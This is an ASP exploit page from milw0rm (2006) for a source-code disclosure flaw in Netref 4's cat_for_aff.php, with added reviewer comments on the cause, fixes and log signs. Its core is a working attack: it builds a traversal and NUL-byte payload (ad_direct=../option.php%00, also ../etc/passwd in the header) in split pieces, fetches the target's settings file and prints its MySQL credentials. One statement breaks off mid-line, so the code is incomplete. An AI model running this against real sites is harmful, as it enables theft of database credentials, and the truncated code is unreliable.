<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
<%
'===============================================================================================
' =>option.php Reader
'[Script Name: Netref 4 (cat_for_aff.php) Source Code Disclosure
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit4.asp
'[Note : exploit file name =>exploit4.asp
'[Note : http://[target]/[path]/script/cat_for_aff.php?ad_direct=../etc/passwd |etc...
'[Using : Write Target after Submit Click
'===============================================================================================
' Reviewer note: per the header above, the reported issue is that cat_for_aff.php accepts a
' file path in its ad_direct parameter, including parent-directory steps. Affected sites
' should constrain ad_direct to an allow-list of expected names inside the application.
%>
<%
' guvenlik (Turkish: "security") - display clean-up helper.
' Removes a fixed list of French inline comments ("MySQL server address", "MySQL user name",
' "MySQL password", "MySQL database name") from the text it is given and returns the rest.
' The patterns look like the comments of a PHP settings file; the header calls this page an
' "option.php Reader", so presumably they come from that file - not confirmed by this page.
' The patterns are applied in the listed order: the bare " MySQL" entry must stay last,
' because the longer patterns contain it.
Function guvenlik(username)
    Dim cleaned, marker
    cleaned = username
    For Each marker In Array( _
            " // Adresse du serveur MySQL", _
            " // Nom d'utilisateur de la base MySQL ", _
            " // Nom d'utilisateur MySQL", _
            " //Mot de passe MySQL", _
            " // Nom de la base MySQL", _
            " // Nom d'utilisateur de la base", _
            " MySQL")
        cleaned = Replace(cleaned, marker, "")
    Next
    guvenlik = cleaned
End Function
%>
Netref 4 (cat_for_aff.php) Source Code Disclosure
Netref v4 (cat_for_aff.php) Source Code Disclosure

TARGET:Example:[http://x.com/path]

<%
' Status messages. islem (Turkish: "operation") comes from the query string; the three
' hataN ("error N") values are the redirect targets used by the form handler further down.
islem = Request.QueryString("islem")
If islem = "hata1" Then
    Response.Write "There is a problem! Please complete to the whole spaces"
End If
If islem = "hata2" Then
    Response.Write "There is a problem! Please right character use"
End If
If islem = "hata3" Then
    Response.Write "There is a problem! Add ""http://"""
End If
%>
<%
' Form handler: runs when the page is requested with islem=get.
If islem = "get" Then
    ' The six fragments are only ever joined in this order (see target1 below), giving
    '   /script/cat_for_aff.php?ad_direct=../option.php%00
    ' i.e. a parent-directory step and a URL-encoded NUL byte inside ad_direct.
    ' NOTE(review): the page does not say why the string is split into pieces.
    ' Defender view: in web-server logs, look for requests to cat_for_aff.php whose
    ' ad_direct value contains "../" or "%00". The fix belongs in cat_for_aff.php:
    ' map ad_direct onto an allow-list of expected names and reject path separators
    ' and NUL bytes before the value is used as a file name.
    string1="/script"
    string2="/cat_for_aff.php?"
    string3="ad_direct=."
    string4="./option"
    string5=".php%0"
    string6="0"
    targettext = Request.Form("text1")
    ' Both searches are case-insensitive (final argument 1 = text compare).
    arama=InStr(1, targettext, "union" ,1)
    arama2=InStr(1, targettext, "http://" ,1)
    ' Input checks on the submitted base URL: must be non-empty, must not contain
    ' "union", and must contain "http://" somewhere (not necessarily at the start).
    ' "Else If" is written as two words, so each one opens a nested If; that is why
    ' four End If statements close the chain at the bottom of the page.
    If targettext="" Then
        Response.Redirect("exploit4.asp?islem=hata1")
    Else
        If arama>0 then
            Response.Redirect("exploit4.asp?islem=hata2")
        Else
            If arama2=0 then
                Response.Redirect("exploit4.asp?islem=hata3")
            Else
%>
<%
                target1 = targettext+string1+string2+string3+string4+string5+string6
                ' take(come): synchronous GET (third Open argument FALSE) through
                ' Microsoft.XMLHTTP; returns the response body as text.
                ' NOTE(review): the request is sent from the server hosting this page to
                ' an address taken from the form with only the checks above, so any host
                ' running this page performs server-side requests to caller-chosen URLs.
                Public Function take(come)
                    Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
                    With objtake
                        .Open "GET" , come, FALSE
                        .sEnd
                        take = .Responsetext
                    End With
                    SET objtake = Nothing
                End Function
                get_username = take(target1)
                ' NOTE(review): the next statement is cut off in this copy - the search
                ' string and the code/markup that followed were lost in extraction. Nothing
                ' visible assigns the "username" variable printed on the Data line below;
                ' presumably that happened in the missing part.
                getdata=InStr(get_username,"
ajann
             Data:  <%=guvenlik(username)%>

<%
            ' Closes the three nested validation Ifs and the outer islem = "get" test.
            End If
        End If
    End If
End If
Set objtake = Nothing
%> # milw0rm.com [2006-10-29]